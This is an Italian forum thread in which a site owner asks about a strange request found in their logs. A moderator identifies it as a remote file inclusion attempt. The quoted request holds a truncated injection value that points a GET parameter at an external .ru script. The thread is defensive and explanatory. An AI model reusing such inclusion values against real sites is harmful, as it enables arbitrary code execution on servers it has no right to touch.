Visualizzazione dei risultati da 1 a 5 su 5
  1. #1

    Tentativo di passare via get un parametro strano

    Ciao ragazzi,
    nelle statistiche del mio sito ho trovato questo tentativo:

    http://www.miosito.it/link.php?link=...od.ru/kol.php?

    mi spiegate cosa stanno cercando di fare?

    Per sicurezza, ho bannato questo ip... che ne pensate?

    Grazie

  2. #2
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    E' un tentativo di remote inclusion. Cercano di vedere se è possibile passare via get un url per includere del codice esterno nella pagina. Se l'attacco andasse a buon fine sarebbe per loro possibile eseguire codice php arbitrario sulla macchina in cui è hostato il tuo sito.

    Se fai una ricerca su google per "remote inclusion" trovi molto materiale.
    http://en.wikipedia.org/wiki/Remote_File_Inclusion
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  3. #3
    Grazie mille, ho alzato le barricate!

    Giusto per curiosità: ogni notte anche voi siete attaccati sia con tentativi simili che da bot che cercano di fare iscrizioni false o inserire commenti automatici?

    Io ogni mattina banno via apache un sacco di ip...

  4. #4
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    si è normale...
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  5. #5
    Utente di HTML.it L'avatar di mark2x
    Registrato dal
    Nov 2005
    Messaggi
    1,940
    Originariamente inviato da Habanero
    Se fai una ricerca su google per "remote inclusion" trovi molto materiale.
    O anche su html.it, già che ne "facciamo parte"....
    http://php.html.it/guide/lezione/298...ia-get-o-post/

    http://php.html.it/articoli/leggi/22...tode-di-php/2/
    http://php.html.it/articoli/leggi/22...tode-di-php/3/

    [.:: JaguarXF ::.]
    __________________

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.